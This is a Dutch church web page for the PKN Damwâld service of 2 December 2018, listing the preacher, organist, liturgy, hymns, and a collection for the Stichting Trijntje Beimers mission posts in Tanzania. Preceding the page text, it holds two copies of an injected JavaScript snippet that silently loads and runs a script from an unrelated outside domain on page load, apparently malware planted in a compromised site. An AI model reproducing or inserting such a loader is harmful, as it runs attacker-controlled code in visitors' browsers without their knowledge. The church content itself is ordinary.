;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 2 december 2018 9:30 uur - PKN Damwâld
zondag 2 december 2018
09:30 uur
KingKids-kerstproject 'Lichtdragers van God' / Koffie na de dienst

Kerkdienst zondag 2 december 2018 9:30 uur

Informatie

Voorganger:Dhr. W. Feddema
Organist:Nienke v.d. Heide-Visser
Mededeling:KingKids-kerstproject 'Lichtdragers van God' / Koffie na de dienst
Liturgie
Lied voor de dienst Elb 418
Welkom
We zingen: Gez 20 : 1,2 en 4
Stil Gebed, Bemoediging en Groet
Aansteken 1e adventskaars
Ylse, aansteken kaars. Rik, draagt gedicht voor.
We zingen: Psalm 89: 1, 13 en 18
Gebed opening van de Bijbel
Vertelling King Kids
We zingen: Projectlied melodie: “MIDDEN IN DE WINTERNACHT”
We lezen: Lukas 1: 26 – 38
We zingen: Gezang 122: 1, 3, 5
Preek .
We zingen: Gezang 66: 1, 3 en 6
Dank- en Voorbede
Collecte
Slotlied Gezang 118: 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Trijntje Beimers

Twee missieposten in een zuidwestelijke uithoek van Tanzania: de Rukwa Provincie. Gesticht in 1967 (Kilangala) en 1977 (Kantembo) door de Friese verpleegkundige Trijntje Beimers die er haar leven lang werkte. Bloeiende gemeenschappen, van betekenis voor een wijde regio. Ze bieden gezondheidszorg en vaktraining, vangen moederloze baby's op, en verkondigen het evangelie. En dat laatste was volgens Trijntje Beimers het allerbelangrijkste. Vanuit Friesland en ook vanuit Canada kwam er financiële steun en waren er vele warme contacten. En dat bleef zo, ook na Trijntje's dood in 2006. Nu zetten de Stichting Trijntje Beimers (STB) en het Zeister Zendingsgenootschap (ZZg) zich samen in voor de ontwikkeling van de missieposten, met als einddoel zo groot mogelijke financiële onafhankelijkheid. Bij Kilangala zijn nog twee andere Nederlandse stichtingen betrokken: ProTanz bouwt er een basisschool en SOLKO stimuleert de landbouw.

Tweede collecte: Kerk
Uitganscollecte: Kerk